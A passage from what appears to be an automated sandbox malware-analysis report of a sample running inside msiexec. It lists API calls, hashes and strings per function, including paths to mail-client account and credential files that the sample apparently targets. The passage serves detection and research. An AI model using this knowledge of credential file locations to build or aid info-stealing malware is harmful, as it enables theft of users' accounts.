                                                                            • _free.LIBCMT ref: 235F7D5F
                                                                            • _free.LIBCMT ref: 235F7D72
                                                                            • _free.LIBCMT ref: 235F7D80
                                                                            • _free.LIBCMT ref: 235F7D8B
                                                                            • _free.LIBCMT ref: 235F7DC3
                                                                            • _free.LIBCMT ref: 235F7DCA
                                                                            • _free.LIBCMT ref: 235F7DE7
                                                                            • _free.LIBCMT ref: 235F7DFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 09d1b9641b676032b4ab0ff4126e8d767c107578f3c41c779c6aaf140767bbfb
                                                                            • Instruction ID: 5544aeeeb2aaa296f992b3d6fe2e4a511b9afe7baf6343892490cf60155a8d4e
                                                                            • Opcode Fuzzy Hash: 09d1b9641b676032b4ab0ff4126e8d767c107578f3c41c779c6aaf140767bbfb
                                                                            • Instruction Fuzzy Hash: E4315C31600705DFEB31AA38F940B6A77F9EF42290F5548A9E84EDB151DE31E980CB14

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F59EA
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F59F6
                                                                            • _free.LIBCMT ref: 235F5A01
                                                                            • _free.LIBCMT ref: 235F5A0C
                                                                            • _free.LIBCMT ref: 235F5A17
                                                                            • _free.LIBCMT ref: 235F5A22
                                                                            • _free.LIBCMT ref: 235F5A2D
                                                                            • _free.LIBCMT ref: 235F5A38
                                                                            • _free.LIBCMT ref: 235F5A43
                                                                            • _free.LIBCMT ref: 235F5A51
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 5fa7ce79fa450874bf830f5a9f117c5074b2de16df56b81dd58aa45a41b6e8f6
                                                                            • Instruction ID: ea01b0c068d4b0fa5a7bfaa0453e54c742fb8f33fcb34db159de9cfb6474e8f1
                                                                            • Opcode Fuzzy Hash: 5fa7ce79fa450874bf830f5a9f117c5074b2de16df56b81dd58aa45a41b6e8f6
                                                                            • Instruction Fuzzy Hash: 2011D27A121248EFCB31DF94E840CDD3FB9EF55290B1544E1BA0D8F224DA32EA509B80

                                                                            Control-flow Graph

                                                                            Control-flow graph edge list for the function starting at 235f9492 (rendered graph not included)
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,235F9C07,?,00000000,?,00000000,00000000), ref: 235F94D4
                                                                            • __fassign.LIBCMT ref: 235F954F
                                                                            • __fassign.LIBCMT ref: 235F956A
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 235F9590
                                                                            • WriteFile.KERNEL32(?,?,00000000,235F9C07,00000000,?,?,?,?,?,?,?,?,?,235F9C07,?), ref: 235F95AF
                                                                            • WriteFile.KERNEL32(?,?,00000001,235F9C07,00000000,?,?,?,?,?,?,?,?,?,235F9C07,?), ref: 235F95E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID: [nk/
                                                                            • API String ID: 1324828854-416449849
                                                                            • Opcode ID: 77623a348c5e271c1b4b38187d2ad58bae8d31b82b0308ef7b70f5c21d467329
                                                                            • Instruction ID: 1878f138fe010a01a1fc1361758d042debfaba00764598b55dccc5c2b4f1ea7d
                                                                            • Opcode Fuzzy Hash: 77623a348c5e271c1b4b38187d2ad58bae8d31b82b0308ef7b70f5c21d467329
                                                                            • Instruction Fuzzy Hash: 4051B171900649AFCB10DFA8D895EEEBBF8FF1A300F14455AE559E7281E730D941CBA0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D1B
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 235F1D37
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D4B
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D58
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D72
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D7D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 1454806937-0
                                                                            • Opcode ID: c49a29950b229616bacbdcb88f9eda3af5d9cc2d3a33aaf8eb5fbcf21b6f82c4
                                                                            • Instruction ID: 88fff5b7d860a770262623f5e5bb235008817b5d8353f6ac4cef333ead0860e2
                                                                            • Opcode Fuzzy Hash: c49a29950b229616bacbdcb88f9eda3af5d9cc2d3a33aaf8eb5fbcf21b6f82c4
                                                                            • Instruction Fuzzy Hash: C6214CB194121CBFD710ABA09C8CEEA76FCEF6A345F0009A6F519D2144E7749E468A70

                                                                            Control-flow Graph

                                                                            Control-flow graph edge list for the function starting at 235f8821 (rendered graph not included)
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,235F6FFD,00000000,?,?,?,235F8A72,?,?,00000100), ref: 235F887B
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,235F8A72,?,?,00000100,5EFC4D8B,?,?), ref: 235F8901
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 235F89FB
                                                                            • __freea.LIBCMT ref: 235F8A08
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            • __freea.LIBCMT ref: 235F8A11
                                                                            • __freea.LIBCMT ref: 235F8A36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID: [nk/
                                                                            • API String ID: 1414292761-416449849
                                                                            • Opcode ID: f24649b899ae6ac8083fe42601104ed1f84d9a7cd019b19130accb8263442fbe
                                                                            • Instruction ID: 0b3f1540bc27215a79f2ea21c39c3bd8d25f1f4aeb620670beec31fd20bff93d
                                                                            • Opcode Fuzzy Hash: f24649b899ae6ac8083fe42601104ed1f84d9a7cd019b19130accb8263442fbe
                                                                            • Instruction Fuzzy Hash: 2951F572610216AFDB259F64EC40EAB37B9EB92764F254AA9FD0CD7140EB38DC50C690

                                                                            Control-flow Graph

                                                                            Control-flow graph edge list for the function starting at 235f3370 (rendered graph not included)
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F339B
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 235F33A3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F3431
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 235F345C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F34B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm$[nk/
                                                                            • API String ID: 1170836740-442316909

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 235F9221: _free.LIBCMT ref: 235F924A
                                                                            • _free.LIBCMT ref: 235F92AB
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F92B6
                                                                            • _free.LIBCMT ref: 235F92C1
                                                                            • _free.LIBCMT ref: 235F9315
                                                                            • _free.LIBCMT ref: 235F9320
                                                                            • _free.LIBCMT ref: 235F932B
                                                                            • _free.LIBCMT ref: 235F9336
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,235F4AEA,?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000), ref: 235F4B59
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 235F4B6C
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,235F4AEA,?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082), ref: 235F4B8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll$[nk/
                                                                            • API String ID: 4061214504-3366075403

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 235F1607
                                                                            • _strcat.LIBCMT ref: 235F161D
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,235F190E,?,?,00000000,?,00000000), ref: 235F1643
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 235F165A
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 235F1661
                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,235F190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 235F1686
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                            • String ID:
                                                                            • API String ID: 1922816806-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 235F1038
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 235F104B
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 235F1061
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 235F1075
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 235F1090
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 235F10B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                            • String ID:
                                                                            • API String ID: 3594823470-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,235F3518,235F23F1,235F1F17), ref: 235F3864
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 235F3872
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 235F388B
                                                                            • SetLastError.KERNEL32(00000000,?,235F3518,235F23F1,235F1F17), ref: 235F38DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,235F6C6C), ref: 235F5AFA
                                                                            • _free.LIBCMT ref: 235F5B2D
                                                                            • _free.LIBCMT ref: 235F5B55
                                                                            • SetLastError.KERNEL32(00000000,?,?,235F6C6C), ref: 235F5B62
                                                                            • SetLastError.KERNEL32(00000000,?,?,235F6C6C), ref: 235F5B6E
                                                                            • _abort.LIBCMT ref: 235F5B74
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,235F6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 235F8731
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 235F87BA
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 235F87CC
                                                                            • __freea.LIBCMT ref: 235F87D5
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID: [nk/
                                                                            • API String ID: 2652629310-416449849
                                                                            APIs
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,?,?,?,235F10DF,?,?,?,00000000), ref: 235F1E9A
                                                                              • Part of subcall function 235F1E89: lstrcatW.KERNEL32(?,?,?,235F10DF,?,?,?,00000000), ref: 235F1EAC
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EB3
                                                                              • Part of subcall function 235F1E89: lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EC8
                                                                              • Part of subcall function 235F1E89: lstrcatW.KERNEL32(?,235F10DF,?,235F10DF,?,?,?,00000000), ref: 235F1ED3
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 235F122A
                                                                              • Part of subcall function 235F173A: _strlen.LIBCMT ref: 235F1855
                                                                              • Part of subcall function 235F173A: _strlen.LIBCMT ref: 235F1869
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                            • API String ID: 4036392271-1520055953
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 235F715C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 235F717F
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 235F71A5
                                                                            • _free.LIBCMT ref: 235F71B8
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 235F71C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,235F636D,235F5713,00000000,?,235F2249,?,?,235F1D66,00000000,?,?,00000000), ref: 235F5B7F
                                                                            • _free.LIBCMT ref: 235F5BB4
                                                                            • _free.LIBCMT ref: 235F5BDB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F5BE8
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F5BF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 804ac8d9ba61165fd1b9754b810efb27f497e80c8d194f54816b7ae607cd15cc
                                                                            • Instruction ID: e6c32097edf854293b1266f0033cc03c291569c993c72da561426ea1dcc26954
                                                                            • Opcode Fuzzy Hash: 804ac8d9ba61165fd1b9754b810efb27f497e80c8d194f54816b7ae607cd15cc
                                                                            • Instruction Fuzzy Hash: 5701D172205701BBC33236757C88E1F2ABDDBE35B57280CE5F91FD2146EE28C9024164
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,235F10DF,?,?,?,00000000), ref: 235F1E9A
                                                                            • lstrcatW.KERNEL32(?,?,?,235F10DF,?,?,?,00000000), ref: 235F1EAC
                                                                            • lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EB3
                                                                            • lstrlenW.KERNEL32(?,?,235F10DF,?,?,?,00000000), ref: 235F1EC8
                                                                            • lstrcatW.KERNEL32(?,235F10DF,?,235F10DF,?,?,?,00000000), ref: 235F1ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat
                                                                            • String ID:
                                                                            • API String ID: 493641738-0
                                                                            • Opcode ID: 13e2814fdb89318ab47bec09cfd74ed1ad06e6ce1a0f2d5a0a7e0492841c0f16
                                                                            • Instruction ID: 90b69e7f98192e1411b9eb4891681392eef846c87fcdb3cdf430dd879ece1665
                                                                            • Opcode Fuzzy Hash: 13e2814fdb89318ab47bec09cfd74ed1ad06e6ce1a0f2d5a0a7e0492841c0f16
                                                                            • Instruction Fuzzy Hash: 21F082361002107BD621372AAC89EBF7BBCEFD7B60B04001AFA0CC3194BB59594392B9
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F91D0
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F91E2
                                                                            • _free.LIBCMT ref: 235F91F4
                                                                            • _free.LIBCMT ref: 235F9206
                                                                            • _free.LIBCMT ref: 235F9218
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: be3e0c6b802f07119ca8a2513aee0ed3b7522ee5f35230f1d0a11fadad060755
                                                                            • Instruction ID: f4351a890f7d087d1af31a91b369572ef97ffa53cb2346b326d7cc6881f25e73
                                                                            • Opcode Fuzzy Hash: be3e0c6b802f07119ca8a2513aee0ed3b7522ee5f35230f1d0a11fadad060755
                                                                            • Instruction Fuzzy Hash: FCF04F71519680D7C660FA59F5C9C1A7BFDFB623557780C85E90ED7504CA24F8808A58
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F536F
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F5381
                                                                            • _free.LIBCMT ref: 235F5394
                                                                            • _free.LIBCMT ref: 235F53A5
                                                                            • _free.LIBCMT ref: 235F53B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 0df0ee7e63da7f96334557b35f18ef055bfe0781ff83532008b2c6c5d34fdd54
                                                                            • Instruction ID: 17753c9d5d5abe225ad7c0c6cd1cc6d7e5f4e833b58e2fd468469d524674c080
                                                                            • Opcode Fuzzy Hash: 0df0ee7e63da7f96334557b35f18ef055bfe0781ff83532008b2c6c5d34fdd54
                                                                            • Instruction Fuzzy Hash: 37F0F970919210DA87267F25A5824283FBDB736659339498AE815932A9DB6985018F81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [nk/
                                                                            • API String ID: 0-416449849
                                                                            • Opcode ID: ae0eaa24ddf3e628303f3596d618aaeec523fe9b926b3319366f7a57273f4731
                                                                            • Instruction ID: b7708112812897f4384dcfe955a58c6c072206dac84b0e54a81a0d8a56747b17
